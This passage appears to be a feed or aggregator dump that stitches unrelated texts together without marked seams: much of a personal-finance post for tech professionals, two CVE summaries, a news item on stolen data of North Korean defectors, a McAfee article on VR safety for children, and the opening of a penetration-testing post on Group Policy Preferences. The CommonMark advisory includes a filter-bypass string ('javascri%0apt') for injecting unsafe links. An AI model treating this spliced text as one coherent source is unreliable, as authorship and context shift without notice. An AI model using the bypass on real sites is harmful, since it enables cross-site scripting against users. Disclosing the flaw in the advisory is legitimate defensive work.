This is Vanguard's 2018 Index Chart and you can either drill down into it and pour over the details or just take one simple truth away from a glance at it: investments grow over time. I know, revolutionary, right? Now to be fair, some investments tank and others skyrocket but what's more important than the minutiae is the overall market forces that enable money to multiply over time. We're looking at 30 years here and $10k invested back in 1988 would be worth almost $59k today invested at cash rates (6.1%), nearly $85k if put into international shares or over $206k if invested in US shares (and that includes the GFC period). There's also CPI at work which makes that $10k worth less today than it was 3 decades ago, but that's tracked at 2.8% per annum which is a damn sight less than a balanced portfolio earns.

An often-heard saying illustrates the value of starting early and allowing time to amplify investments:

It's not timing the market, it's time in the market.

In reality, it's both and buying anything at a low-point is obviously going to net you more dollars than buying at the peak. But the point of all this is that starting young enormously amplifies earning potential and to bring this back around to the tech industry again, those of us in this space have a much better chance than most to earn well at a young age. Let me put some personal context around this:

Almost 9 years ago I wrote a post on a real estate forum looking for feedback and inspiration. We'd bought a lot of property by that time and it became the foundation on which so much of what we've done since has been built. This is the first time I've mixed these two worlds - my background with real estate and my public blogging life as most readers will know it - but it's important context. Do read that post as it goes a long way to explaining why I'm writing this post and indeed, why I have the financial options I do today.

Kylie and I started investing while we were young. We began purchasing real estate in 2003 in our mid-20s and we poured every cent we could save into it. Some purchases were better than others, of course, but the constant theme across all of them was that we knew that good investments made young would pay off big time in the long term. It also created a forced savings plan for us; money in real estate is not "liquid" so you can't readily draw it out of a savings account on a whim and loans need to be paid on time each month or banks start getting cranky. (Incidentally, this is also a strength of home ownership as it's effectively a forced savings plan.) We maximised our borrowing potential, took advantage of every available tax concession and relentlessly pursued more property as soon as we had the savings to put down another deposit. We took risks, but they were calculated and made at a time where we had 2 incomes and no dependants. Everything gets harder when there's kids; more expenses, less time and often, less income if one partner decides to stay at home or work less.

By no means am I saying "go out and put all your money into property", it might be that you start putting a very small amount of money into a share portfolio or managed funds early on, the point is that time amplifies money (at the very least, everyone should understand how compound interest works). That was the single best financial decision we ever made and it happened well before my life as people know it today; there was no Pluralsight, no workshops, no speaking events or Have I Been Pwned or blog sponsorship - nothing. Yet today, that property portfolio is a significant portion of our wealth because even though we weren't earning much money then by comparison, it amplified over and over again.

I want to touch on 2 more things on this because I know they'll come up if I don't mention them. Firstly, if you've passed the age that you might consider "young", the same logic of time amplifying dollars still applies. Obviously, you have less time and there are other considerations such as retirement funds (and associated tax implications), the point is that the earlier you begin on this journey, the better. And secondly, no, this wasn't done with financial support from parents. No deposits were handed out, no financial guarantees were made on our behalf, every single cent had to be earned, saved and then invested. But there was some help we got that moved everything along, and that was with financial literacy.

Lesson 3: Invest in Financial Literacy

I regret many things about my own education at school and university. I regret that I had to learn French in high school. I regret that I had to do chemistry as part of the computer science degree I started and never finished. But most of all, I regret that I was never taught financial literacy. I never learned the importance of the things I've already written in this blog post nor how the share market or property market work or even something as simple as the impact of compound interest on a credit card, something that's at crisis level for many people here in Australia at the moment. These things, to my mind, are essential life lessons and I do hope things have moved on a bit in the education system since then.

But we did have encouragement from our parents when it came to imparting financial advice. The two most notable things that come to mind were my father regularly repeating lesson 1 above (money gives you choices), and Kylie's father helping us understand how the property market works (he worked in the industry). But that was a tiny portion of the education with the vast bulk of it made up of reading books and magazines, going to seminars, hanging out on forums and frankly, also learning by making mistakes. We lost money on shares. We missed opportunities that would have yielded amazing results. We had property deals fall over. We got a lot of stuff wrong, but we got a lot more stuff right.

Part of developing financial literacy is that the more you learn about money, the more conflicting advice you'll get. Last week I tweeted about drafting up this post and I had a number of people contact me with their own tips. One person emailed me with many that aligned with mine, but he also said "only buy properties that you feel you could live in, they are homes as well as investments". I would never want to live in any of our properties we bought as investments. When you buy an investment - any investment - you should be ruthlessly focused on the numbers; what it's yielding, what the growth opportunities are, the tax advantages etc. When you buy a home to live in, you're buying with the heart because a home is a very emotional purchase. That's not to say you can't buy a home that's also a good investment, but you have different priorities and the perfect home for you to live in is almost certainly not the perfect asset for you to invest in. I don't want to live in any of our properties, but they're in high growth areas with good accessibility to public transport and low vacancy rates. Now, that doesn't make me right and him wrong, it's merely an illustration that there are many different views out there and the challenge for you is to understand the reasoning behind them and work out what actually makes sense for you. That knowledge is an investment you have to make.

Financial literacy is a fundamental skill which we all need but few of us genuinely invest in. There are a heap of resources available where you can learn for free and whilst there's frankly a lot of crap out there (the are way too many dodgy characters trying to sell investment opportunities!), it all contributes to the melting pot of information you can absorb. I'm conscious that for most people, developing financial literacy probably seems like a difficult thing that requires a time commitment. And I agree. I found it hard and I found a huge amount of my time being spent on it, but I do believe that we, fellow geeks, have some advantages here.

Those of us in the tech industry are used to seeking out information online. Crikey, I still use Google every time I need to write text to a file in C#! We're also used to engaging with others online in order to learn, we've been doing it on Stack Overflow for years and we can do it on any number of investment forums, debt support communities or other resources designed to help educate in the same way as the tech ones we're so dependent on. I made 414 posts on the property forum I referenced earlier, more than all my questions and answers on Stack Overflow combined.

If you're not sure where to start on this, there's one area of financial literacy that is absolutely essential to understand, and that's tax.

Lesson 4: Learn the Tax System

There's a very famous clip of Kerry Packer (for many years, Australia's richest person), who was questioned about his tax practices in court back in '91. This is worth a quick watch (it's 2 minutes):

The key sentence being the last one in that clip:

Now, of course I am minimising my tax and if anybody in this country doesn't minimise their tax, they want their heads read because as a government, I can tell you you're not spending it that well that we should be donating extra.

Regardless of what you may think of the tax practices of billionaires, it's hard to argue with that statement (it's also hard not to chuckle just a little!). Tax is bloody complicated stuff yet it's something we all need to deal with in one way or another. It also consumes a significant chunk of your income and that only increases as you earn more and spend more. Understanding how your local tax system works is an absolutely essential part of that financial literacy I was just writing about.

For example, in Australia we have pretty attractive negative gearing tax laws for real estate and I'll steal the definition off Wikipedia to explain precisely what that means:

Negative gearing is a form of financial leverage whereby an investor borrows money to acquire an income-producing investment and the gross income generated by the investment (at least in the short term) is less than the cost of owning and managing the investment, including depreciation and interest charged on the loan (but excluding capital repayments).

What this has meant for us is the ability to buy property and claim deductions for non-cash expenses (that is they're not actually coming out of your pocket) thus reducing our taxable income and ultimately increasing our take-home pay. For example, buildings, fittings and fixtures all "depreciate", that is their value decreases over time. Think about curtains - they wear out and need to be replaced and the Australian tax system affords you the ability to claim that depreciation before you actually need to spend the dollars. Your country may well have different laws, but the point is that tax constructs exist to help you legally reduce the amount payable. (Side note: there's been calls for years to abolish negative gearing in Australia in this fashion and there were indeed pretty significant changes made in the 80's... then rolled back.)

Retirement funds are another great example. In Australia, our "superannuation" scheme (think 401k in the US) makes it very attractive to contribute extra cash at a low tax rate. Only up to a threshold, that is, and even that changes based on your age but again, there are constructs designed by the government the help everyone maximise the effectiveness of the dollars they earn by minimising the amount of tax payable on them.

Tax is also where professional help is really important. Unless you're on a very low income that's just a simple wage from an employer, in my experience the ROI of professional guidance means it makes sense to get a good accountant early. Especially once there's more money involved, a very small percentage difference made by a taxation professional easily covers their cost (you may well find that's an allowable deduction too). Over time, our accountancy needs changed from a basic accountant we saw once a year to a larger scale firm we call on regularly. Your needs may well change too as you move through different phases of life, but get someone you can trust and get them early.

Optimising your tax position is free money. Free legal money and there are many, many ways to do it. In this industry, there's everything from income-producing equipment to conferences to charitable donations to an organisation like Let's Encrypt that can reduce your tax bill (obviously get expert advice on this if you're not sure). Sometimes, it's even just as simple as deferring tax that's payable so that you have access to the money for longer and can reap the benefits of the interest it earns. Pay your taxes, but don't donate extra.

Lesson 5: Know Good Debt from Bad Debt

The word "debt" immediately has negative connotations for a lot of people. Many of those people have a bunch of "bad" debt and little or no "good" debt. The latter term might sound paradoxical, but I'll get back to that. Let's start with the bad stuff.

Bad debt is the likes you have on a credit card. It's almost always accrued on a depreciating asset (for example, a new TV) and it's very often at a high interest rate. A credit card in Australia right now can easily run you around 20% per annum which means that not only are purchases going to cost way more than the sticker price (assuming the card isn't paid off each month), but the value of the purchase is also heading south leaving you with negative equity (you owe more than the thing is worth). Because credit cards have such a high rate on them, the single best investment you can make right now is almost certainly to pay off any debt you have on a card as fast as possible. Think back to that Vanguard chart - the highest yielding shares they had there (the US ones) were growing at 10.6% and paying off a credit card can effectively earn you double that. (Side note: that last sentence isn't entirely accurate as income earned on investments is usually subject to tax whereas paying off consumer debt will often have no tax obligations at all. Or if we go even deeper down the rabbit hole, those US shares at 10.6% include capital gains and that's something you may only pay tax on when you sell. So in other words, both the points made in this side note make the investment value of paying off credit card debt even more important than investing in other asset classes.)

Payday loans are another prime example where you have fast, easy access to cash but pay an astronomically high interest rate for the privilege. For example, via Nimble, one of Australia's most prominent short-term lenders:

10 Personal Finance Lessons for Technology Professionals

What does that look like in actual dollar terms? Let's imagine you need a couple of thousand for 12 weeks:

10 Personal Finance Lessons for Technology Professionals

I highlighted the most important part in red because for some reason it was very small and a bit hard to read... In other words, for a loan that's less than a few months long you pay back an additional 32% over what you actually borrowed in the first place. This, in effect, makes whatever it is you bought with that money 32% more expensive and yes, I know that many people are under financial duress and may not have other options, the point is to understand what the actual impact of this debt really is. Remember also that compound interest works on debt too, not just savings. The longer you run with debt, the more you pay. (Side note: I watched a really interesting Netflix documentary on short term loans recently as part of their Dirty Money series - check out the Payday episode.)

Good debt is an investment. All our property purchases, for example, have loans not only because we simply couldn't have afforded to pay cash at the time, but because debt can give you leverage. Rather than paying, say, $250k in cash, you'd put down, say, a 10% deposit and pay perhaps 5% per annum in interest. You then have cash flow from the asset (rent paid by tenants) and as mentioned earlier, there may also be non-cash deductions that give you taxation benefits. You also have expenses, primarily loan repayments but also maintenance, council rates, insurance and possibly strata and property management fees. I don't want to go down that rabbit hole here (we're getting back to the importance of financial literacy again), but the point is that debt can be used to build wealth in an accelerated fashion. (Incidentally, the same approach can be used in shares and managed funds, this is not just the domain of real estate.) Borrowing for education can also be good debt. Kylie and I both had student loans via HECS in Australia which we had to pay off as we began earning money. This was an investment in our future and the return on the investment was an education.

This isn't to say that "good" debt is always a smart idea and in some cases, it can amplify losses dramatically. Some of the properties we bought were only several years old and were being sold for 30%+ less than the original owners had paid. Developers often entice buyers by offering "honeymoon" interest rates and rental guarantees that make the cash flow position look very positive to the unsophisticated investor. However, once those expired and the penny dropped that the properties were no longer financially sustainable (interest rates went up, rent went down), they became distressed sales and the unfortunate purchasers learned that the market valued the properties at a very different mark to what the developers were selling them for. Suddenly, the 5% deposit they paid to get access to real estate has created negative equity 6 times more than that.

Conversely, what we might traditionally consider "bad" debt can be good and I'll give you an example of that. This whole post kicked off with me talking about a car and as much as I love them, let me be really clear about this: fancy cars are one of the worst possible things you can ever spend your money on! They're functionally equivalent to models that are a fraction of the price, they depreciate very rapidly and they have a bunch of acquisition costs that disappear into thin air the moment you buy them (stamp duty, for example). But those are principles I understand very well so I make purchases with full consciousness of the financial impact. The point re bad debt potentially being good is that whilst a car is a depreciating asset, we've had cars in the past where the manufacturer's interest rate was far more attractive than the interest we could earn on the money elsewhere which would make paying cash a sub-optimal use of the money. You need to be careful that an attractive interest rate isn't just capitalised into the purchase cost of the vehicle (and I've definitely seen that before), but the point is that debt can be used in a variety of constructive ways and some of them may be unexpected.

Over and over again, we come back to financial literacy and a big part of that is understanding not just how to use debt efficiently, but how to manage the risk it creates. I reckon as technical folks we tend to be more analytical than your average person and one of the best things you can do for you financial wellbeing is to chuck everything into spreadsheets. This debt situation, for example, can be really multifaceted so if you're looking at taking out a loan, put everything into Excel and analyse the bejesus out of it; cash flow impact, capital gain / loss, opportunity cost (what else you could do with the deposit and repayments), etc, etc. I've had many occasions in the past where I've literally sat down and written all my analysis in C# because I understood the code better than the finances! But by doing that, you learn, and that's a great way of working on financial literacy. (Side note: service like Mint are also a great way of tracking your financial position.)

Lesson 6: Diversify Earning Potential and Risk

This one starts to get to the heart of where money comes from and how to protect it. Specifically to this industry, we have much better potential than most to both earn it and keep it - let me explain.

Traditional incomes generally boil down to trading time for money from a single source (your employer). It certainly did for me for many years and in my case, it meant going into Pfizer each day, doing my architecty thing and receiving a monthly pay check. As we've already established further up, a software architect in this industry can do quite well but this traditional means of working does create risk and I saw that manifest itself through many rounds of redundancies over the 14 years I was there. I'd see the stress people went through as their roles were cut and they were out of a job and there were 2 main reasons for that:

  1. Their job was their sole source of income and if it went, so did their cash flow (in some cases, it was the sole source of income between both them and their partner who may be a stay at home parent)
  2. They were worried about their ability to get another job which, again, would also have a pretty significant cash flow impact

We went through that stress ourselves; about 7 years ago Kylie's job was made redundant. She was 6 months pregnant (seriously, who does that to a pregnant woman about to go on maternity leave?!) and it was entirely unexpected and left us with a very uncertain future. Fortunately, we had my income to cover us and we'd obviously planned in advance for the maternity leave, but it still rocked us.

So let's drill down on this "diversify earning potential" concept and the first point I want to make on that is about your own personal marketability. My very first blog post ever was Why online identities are smart career moves and a cornerstone of that post was that you never know when you might be looking for another job. Making yourself marketable isn't something you can do well at the drop of a hat, it can take significant effort and it's something you need to plan for in advance. You might not necessarily think of that as a personal finance tip, but it can have a fundamental impact on your ability to earn money.

One of the suggestions I received when tweeting about this post last week was this:

Here's a perfect example that illustrates my point: when I first interviewed for the Pfizer job in 2001, I showed a pet project I'd built. It was a classic ASP and Access Database (stop laughing) project that managed photos I'd taken. It was very basic, but it gave me something to show that demonstrated work in the field. I clearly remember showing my boss's boss the work and him being impressed by it, despite its simplicity. This was a personal project done on my own time as part of my own education and it played an important part of landing me the job I had for the next 14 years. That's the job that contributed significantly to the investment portfolio!

Pet projects, open source contributions, robust Stack Overflow profiles, local user group engagements and a raft of other things you can do in your spare time all contribute to marketability and in turn, diversify your earning potential. (Incidentally, the talk I referenced earlier on Hack Your Career covers all of this in more detail.) This is one of the great advantages we have in this industry in that it's so easy to expand our professional repertoire in our spare time. I'll give you an example of the antithesis of that: One of the people I saw forced into redundancy at Pfizer was in a senior role they'd been in for a very long time (I'm going to be a little vague here in case they read this) and frankly, they really had very little (any?) industry experience outside of that. They were proficient at their job but they really didn't have skills that were transferable across the industry and when the redundancy finally came, they were out of work. Permanently. They ended up re-skilling in another industry in what was quite a stressful time for them.

Moving on, another great attribute of tech is the ability to diversify income sources. Now, I'm conscious there are cases where the employer may prohibit some of these things (even on personal time) but as an example, I did a lot of small independent website projects whilst in my corporate role. Nights, weekends, holidays were often spent building brochureware websites or other little pieces of work that could earn income. Independent income which would contribute to our financial wellbeing. That money then went into the property portfolio and grew further so think about the leverage that provided: the extra money earned was nice in and of itself, but that was then used to borrow money (so it was leverage) which bought appreciating assets. Those nights, weekends and holidays ultimately became very valuable.

In 2012, I started creating what many people came to know me by: Pluralsight courses. Again, something that could be done independently without conflict with my day job. There are many, many little opportunities like this which can actually contribute to both the points made in these last 2 paras, namely diversifying your experience and actually generating income. Today, no more than about 20% of our income comes from any one source which is enormously important in terms of diversification. It means that, for example, if Pluralsight goes down the toilet then yes, I'd be very upset by that but no, it wouldn't be a life-changing event.

Which brings us to risk. Risk is reduced when you have more choices and it's reduced again when you have more sources of income. Drawing it back to investment strategies, you'd never proverbially put all your eggs in one basket by, say, putting all your cash into one stock. Using all your savings to buy that one magic bean, so to speak. When we bought real estate, we bought at a level that would enable us to diversify; I'd rather have 2 small apartments in different suburbs than 1 house because it gives you insurance against everything from tenant vacancies to repairs that need to be made to something extreme like the place burning down. And you definitely don't want all your exposure in one asset class either; property, shares, cash and all sorts of other investment vehicles enable you to spread risk. Try a Google search for life savings lost in investment scheme and you'll understand why this is so important.

Invest in diversifying your earning potential and your assets such that it reduces your risk.

Lesson 7: Prepare for Luck

When I started drafting this blog post all those years ago, one of the things I immediately thought of was this book:

10 Personal Finance Lessons for Technology Professionals

Malcolm Gladwell is a sensational author and his previous books The Tipping Point and particularly Blink are absolute must reads. But what I particularly liked about Outliers is how he systematically broke down the factors that contributed to the success of very noteworthy people such as Bill Gates, The Beatles and even elite athletes. On that final point, let me draw an extract from Wikipedia that illustrates one of the success factors Gladwell identified:

The book begins with the observation that a disproportionate number of elite Canadian hockey players are born in the earlier months of the calendar year. The reason behind this is that since youth hockey leagues determine eligibility by calendar year, children born on January 1 play in the same league as those born on December 31 in the same year. Because children born earlier in the year are statistically larger and more physically mature than their younger competitors, and they are often identified as better athletes, this leads to extra coaching and a higher likelihood of being selected for elite hockey leagues.

There are 2 ways of thinking about this as it relates to success factors and the first is that elite hockey players are exceptionally talented. Regardless of the other opportunities that were granted to them, you simply can't play at that level unless you're at the absolute top of your game. The second is the real insight in this piece and it's that the older kids have a natural advantage due to those extra months of growth. An unfair advantage, some would argue, but an advantage all the same. But it wasn't all luck either - there's plenty of kids born in January that can't compete with much younger players because they simply don't have the natural talent or the family support or the dedication to train or whatever else it may be. Being successful at that level requires both luck and talent.

Bill Gates is worth a mention as it ties in nicely with the tech-centric theme of this post. Yes, he's obviously a super smart bloke, but it was his (very fortunate) access to computers courtesy of his mother's job that amplified that talent and enabled him to build Microsoft. And this is really the point I'm getting at in this lesson: we all come across fortuitous situations - "luck", if you will - and you need to be prepared to take advantage of those opportunities. Those situations may be anything from a sudden job opportunity to a chance investment, both of which often require preparedness to take advantage of. For example, do you have a presentable resume and references for that chance job? Do you have up to date tax returns and financial statements for the investment? Are you able to leverage the skills and the assets that you have - that we all have - to be able to take advantage of these opportunities when they arise? I certainly haven't always and I lament the ones I missed because I simply wasn't prepared.

I vehemently dislike seeing successful people referred to as "lucky" or "fortunate" without further context. Not because they're inherently wrong words to use, but because they imply people achieved that success by chance. It must also be disheartening for others who don't believe they're as lucky or as fortunate themselves which is why I love this quote:

I am a great believer in luck. The harder I work, the more of it I seem to have.

There's debate about who originally said it but it doesn't particularly matter as the sentiment rings true regardless. What I hope people take away from it is an acknowledgement that hard work and preparation amplifies the luck that we all come across from time to time.

One more thing on the whole "luck" piece because it will come through in comments if I don't address it: Just as the older hockey players benefited from the month they were born in, I've benefited from factors I was born into. My gender. My ethnicity. The country I was born in. Even the countries I've lived in; I spent the last few years of high school in Singapore which was an absolute tech mega centre compared to most of the rest of the world in the early to mid-90's when I was there. A chance meeting at the local windsurfing club with a guy working for a satellite systems engineering company in '92 got me my first part time job in technology. These are factors I had no control over, but I amplified that good fortune by working my butt off when I was given the chance. Whatever your circumstances, the premise that opportunities will present themselves over time and that being prepared to leverage them is important is still an absolutely essential lesson.

Lesson 8: Put a Price on Your Time - and Your Family

I stopped playing video games probably about a decade ago. Half Life 2 was my game of choice at the time and I could easily blow a few hours fragging everything that moved. Whilst it certainly wasn't at an addiction level, it was still enough time spent that eventually it dawned on me that it simply wasn't a good way to invest my hours. Now I want to be clear about something here too: investments aren't always of a monetary nature, they can be investments in your health or your mental state or your family and as it stands today, I spend more time playing tennis each week than I did fragging. But the return on that investment is so much greater for my mental state and my health than what HL2 ever was.

To the point about putting a price on your time, I realised holistically I was much better off focusing on our investments and my own personal development than I was spending the time gaming. As time has gone by, I've become more and more conscious of what the value of my time is. Sometimes it's a clear monetary value; I charge companies to run security workshops which is a direct exchange of time and money. Other times it's much less tangible but it feels like it's moving things along in the direction I want them to go. This blog post is a perfect example of that insofar as it will make me zero dollars directly but I feel like it's the right thing to do because it has the potential to improve life for others. Understanding the value of time (and particularly how it changes over the years) has also helped me decide where to spend money to buy back hours; a house cleaner a couple of times a week, someone to wash the cars, business class airfares.

Then there's putting a price on your family. People hate it when I use this term - "what do you mean I should put a price on my family, my family is priceless!" - and they continue to hold that position as they head off to the office each day. The reality is that we all trade time with our families to partake in activities that enable us to actually support them, but most people don't favour thinking about it in those terms. It doesn't have quite the same ring to it, but perhaps a more accurate title would be "consider how much family time you're willing to sacrifice for your prosperity and how long you're willing to wait for that investment to pay off". If you don't have a family to consider, put it in terms of other personal activities you're willing to trade; I traded gaming, others might trade social activities or a holiday or some other form of sacrifice that results in them working towards their own prosperity.

What I mean by putting a price on your family is that you should work out when it makes sense to prioritise spending time with them and when it makes sense to invest time to focus on other things. For many people, there’s no desire to commit anything more than 40 hours a week to earning a living and that’s just fine, so long as the lifestyle that gives them is consistent with the one they want and they're not left unfulfilled as a result. What drives me nuts is when you see people wistfully longing for certain financial or lifestyle goals yet being unwilling to make the sacrifices to get there (more on that in the next lesson).

My balance has changed over time. In the earlier years of my career when I was mostly on hourly contracts, it would be 11-hour days most of the time because surprise, surprise, that pays a lot more than 8-hour days (and remember, that went into leveraged assets that then grew in value over many years). It was fine when it was before kids too and Kylie was either studying or building her own career with similar hours, we both just knuckled down and got on with it. It’s always going to be harder with kids, particularly because higher workloads are inevitably passed onto your spouse if you’re the one doing the extra career things. What I'm finding now is that because we made those sacrifices before kids were around, we're enjoying the pay-off while they're still young.

If nothing else, at least consciously make choices about where time is spent and one of the best things that'll help you do that is to have a goal.

Lesson 9: Have a Goal

The best way I can explain this is to share a speech by Arnold Schwarzenegger. Invest 12 minutes listening to this:

Don't waste your minutes. Work your arse off. You have 24 hours in a day, you sleep 6 of them, maybe you burn 12 with work and travel so now you have 6 hours left. You eat / schmooze a little, but you see how much time is left.

If you don't have a vision of where you're going, if you don't have a goal where you go, you drift around and you never end up anywhere.

A goal keeps you focused. A goal drives you to invest time in working towards something. A goal makes you relish the pain required to achieve it. Schwarzenegger talks about the physical pain of reaching his goals, but also about improving knowledge by investing time which aligns with what you've read here. Now, clearly he took a very extreme approach to reaching his goal because it was an extreme goal. I'm not saying everyone should go out and spend every spare moment figuring out how to maximise their dollars, but what I am saying is that you need to know why you're doing this - what you're working towards - and depending on how lofty that goal is, it may indeed take a significant amount of effort over a long period of time.

In this industry, we work with goals the whole time and we've all worked with tools that help enable us to hit them. We have backlog items that need to be completed and they can just as well be things like getting your insurances in order, assessing your retirement strategy (yes, even when you're young) or setting a learning objective. We deliver work units in sprints and when you have a long-term goal, there's going to be many individual sprints within it. Kylie and I continually have retrospectives; what's working, what's not, what do we need to do differently. And if we really want to draw out the agile analogies, nothing requires adaptive planning like your financial future does because there are so many environmental factors that change; your job, your family structure, interest rates and any number of other things that require a course correction. We, tech friends, understand this. This is what we do day in and day out and you can extend that to your personal financial prosperity.

Inevitably, we all have multiple goals and they'll change over time too; for many years whilst I was living in Sydney and working for Pfizer, my goal was to gain independence and move back the Gold Coast where my family was. In 2015, we did that:

So, I made new goals. I've certainly had others too and they haven't always been this long-term or life-changing. For example, I've had goals for certain cars I've wanted and in some cases, it's taken many years to achieve them. In other cases, I'm yet to achieve them but they're still there on the horizon, driving me forward and giving me direction.

Goals can be very personal; perhaps your goal is to retire young. Maybe it's to support your extended family. It might even be to give as much as you can to charity (Gates is a perfect example of that) and all of those are just fine, but have a goal because without that... you drift.

Lesson 10: Financial Prosperity is a Partnership

I wanted to finish on this point because it's absolutely pivotal to making all the previous ones actually work. If you're in a partnership with someone (wife, boyfriend, whatever), perhaps the most valuable advice I can give is that you must approach financial prosperity as a partnership with a shared vision. If you're not aligned - if you have fundamentally different objectives - you won't be able to give your goals the focus they deserve.

I think back to friends I've seen in the past struggle with this. For example, one partner becomes resentful of the amount the other is spending on personal indulgences. Or they resent the family sacrifices the other is making. Or one is satisfied with a subsistence living whilst the other dreams of millions. Lack of alignment not only makes achieving financial objectives difficult, it can drive a wedge right through the middle of a relationship and I'm sure we've all seen many fail simply because the couple don't see eye to eye on fundamental issues.

I'll give you a few examples of what I mean and the first one that came to mind (for some strange reason) was when Kylie and I were planning a family. Like most couples, there comes a time where that's on the cards and for us we started talking seriously about it in 2008. As we began planning, we literally went to a quiet spot in a local restaurant with a laptop and drew up a spreadsheet of what having a baby would mean. We did this together and planned everything from loss of income due to maternity leave, government parental benefits, the taxation implications of both and even medical expenses and the maintenance cost of a child. I'm sure we didn't get that all spot on (the last one in particular), but the point is that we made a financial decision together (and having a kid is a very big financial commitment) with as many of the facts as possible in front of us.

That partnership extends to everything from the investments we make to the travel I do to the insurances we have (NB: things like income protection and life insurance are another one of those financial literacy things). This isn't just to ensure alignment, it's also a great sanity check. If you're in a relationship, you'll probably find there are aspects of this whole financial prosperity thing that each of you does better than the other; I'm "big picture" and number orientated, Kylie is detail-focused and frankly, much more patient than me! Explaining things to each other has a way of ensuring you stay on track.

But perhaps even more importantly than all of that, relationships are meant to be a partnership. A journey you take together. Hopefully a very long journey that requires planning and there are few more fundamental relationship issues than how you view money.


If you're working in tech, you're working in one of the most well-paid industries with the greatest growth potential and career prospects out there. Your financial potential almost certainly exceeds that of almost everyone else around you. You're already winning just by being here and my hope is that whilst the first tweet in this post might have provided motivation, the post itself helps provide inspiration.

Feel free to ask questions in the comments section below and I'll answer what I can. Also - and I trust this was obvious already - do treat this post as a reflection of my own views and experiences and get professional advice where necessary.

CVE-2018-20595 (hsweb)

A CSRF issue was discovered in web/authorization/oauth2/controller/ in hsweb 3.0.4 because the state parameter in the request is not compared with the state parameter in the session after user authentication is successful.

CVE-2018-20583 (commonmark)

Cross-site scripting (XSS) vulnerability in the PHP League CommonMark library versions 0.15.6 through 0.18.x before 0.18.1 allows remote attackers to insert unsafe URLs into HTML (even if allow_unsafe_links is false) via a newline character (e.g., writing javascript as javascri%0apt).

Hackers steal personal data from 997 North Korean defectors

Hackers just caused grief for North Korean defectors. South Korea's Unification Ministry has revealed that attackers stole the personal data of 997 defectors, including their names and addresses. The breach came after a staff member at the Hana Foundation, which helps settle northerners, unwittingly opened email with malware. The defectors' data is normally supposed to be isolated from the internet and encrypted, but the unnamed staffer didn't follow those rules, officials said.

Source: Wall Street Journal

Mind-Bending Tech: What Parents Need to Know About Virtual & Augmented Reality 

Virtual and Augmented reality technology is changing the way we see the world.

You’ve probably heard the buzz around Virtual Reality (VR) and Augmented Reality (AR) and your child may have even put VR gear on this year’s wish list. But what’s the buzz all about and what exactly do parents need to know about these mind-bending technologies?

VR and AR technology sound a bit sci-fi and intimidating, right? They can be until you begin to understand the amazing ways these technologies are being applied to entertainment as well as other areas like education and healthcare. But, like any new technology, where there’s incredible opportunity there are also safety issues parents don’t want to ignore.

According to a report from Common Sense Media, 60 percent of parents are worried about VR’s health effects on children, while others say the technology will have significant educational benefits.

Virtual Reality

Adults and kids alike are using VR technology — headsets, software, and games — to experience the thrill of being in an immersive environment.

The Pokemon Go app uses AR technology to overlay characters on an existing environment.

According to Consumer Technology Association’s (CTA) 20th Annual Consumer Technology Ownership and Market Potential Study, there are now 7 million VR headsets in U.S. households, which equates to about six percent of homes. CTA estimates that 3.9 million VR/AR headsets shipped in 2017 and 4.9 million headsets will ship in 2018.

With VR technology, a user wears a VR Head Mounted Display (HMD) headset and interacts with 3D computer-generated environments on either a PC or smart phone that allows them to feel — or experience the illusion — that he or she is actually in that place. The VR headset has eye displays (OLED) for each eye that show an environment at different angles to give the perception of depth. VR environments are diverse. One might include going inside the human body to learn about the digestive system, another environment might be a battlefield, while another might be a serene ocean view. The list of games, apps, experiences, and movies goes on and on.

Augmented Reality

AR differs from VR in that it overlays digital information onto physical surroundings and does not require a headset. AR is transparent and allows you to see and interact with your environment. It adds digital images and data to enhance views of the real world. AR is used in apps like Pokémon Go and GPS and walking apps that allow you to see your environment in real time. Not as immersive as VR, AR can still enrich a physical reality and is finding its way into a number of industries. VR and AR technologies are used in education for e learning and in the military for combat, medic, and flight simulation training. The list of AR applications continues to grow.

To support these growing technologies, there are thousands of games, videos, live music and events available. Museums and arcades exist and theme parks are adapting thrill rides to meet the demand for VR experiences. Increasingly retailers are hopping on board to use VR to engage customers, which will be a hot topic at the upcoming 2019 Consumer Electronics Show (CES) in Las Vegas.

Still, there are questions from parents such as what effect will these immersive technologies have on children’s brains and if VR environments blur the line between reality and fantasy enough to change a child’s behavior. The answer: At this point, not a lot is known about VR’s affect on children but medical opinions are emerging warning of potential health impacts. So, calling a family huddle on the topic is a good idea you have these technologies in your home or plan to in the near future.

VR/AR talking points for families

Apply safety features. VR apps and games include safety features such as restricted chat and privacy settings that allow users to filter out crude language and report abusive behavior. While some VR environments have moderators in place, some do not. This is also a great time to discuss password safety and privacy with your kids.

The best way to understand VR? Jump in the fun alongside your kids.

Age ratings and reviews. Some VR apps or games contain violence so pay attention to age restrictions. Also, be sure to read the reviews of the game to determine the safety, quality, and value of the VR/AR content.

Inappropriate content. While fun, harmless games and apps exist, so too does sexual content that kids can and do seek out. Be aware of how your child is using his or her VR headset and what content they are engaged with. Always monitor your child’s tech choices.

Isolation. A big concern with VR’s immersive structure is that players can and do become isolated in a VR world and, like with any fun technology, casual can turn addictive. Time limits on VR games and monitoring are recommended.

Physical safety/health. Because games are immersive, VR players can fall or hurt themselves or others while playing. To be safe, sit down while playing, don’t play in a crowded space, and remove pets from the playing area.

In addition to physical safety, doctors have expressed VR-related health concerns. Some warn about brain and eye development in kids related to VR technology. Because of the brain-eye connection of VR, players are warned about dizziness, nausea, and anxiety related to prolonged play in a VR environment.

Doctors recommend adult supervision at all times and keeping VR sessions short to give the eyes, brain, and emotions a rest. The younger the child, the shorter the exposure should be.

Be a good VR citizen. Being a good digital citizen extends to the VR world. When playing multi-player VR games, be respectful, kind, and remember there are real hearts behind those avatars. Also, be mindful of the image your own avatar is communicating. Be aware of bullies and bullying behavior in a virtual world where the lines between reality and fantasy can get blurred.

Get in the game. If you allow your kids to play VR games, get immersed in the game with them. Understand the environments, the community, the feeling of the game, and the safety risks first hand. A good rule: If you don’t want your child to experience something in the real world — violence, cursing, fear, anxiety — don’t let them experience it in a virtual world.

To get an insider’s view of what a VR environment is like and to learn more about potential security risks, check out McAfee’s podcast Hackable?, episode #18, Virtually Vulnerable.

The post Mind-Bending Tech: What Parents Need to Know About Virtual & Augmented Reality  appeared first on McAfee Blogs.

Penetration Testing on Group Policy Preferences

Hello Friends!! You might be aware of Group Policy Preferences in Windows Server 2008 that allows system administrators to set up specific configurations. It can be used to create username and encrypted password on machines. But do you know, that a normal user can elevate privilege to local administrator and probably compromise the security of the entire domain because passwords in preference items are not secured.

Table of Content

  • What is Group Policy Preferences?
  • Why using GPP to create a user account is a bad Idea?
  • Lab Set-Up Requirement
  • Create an Account in Domain Controller with GPP
  • Exploiting Group Policy Preferences via Metasploit -I
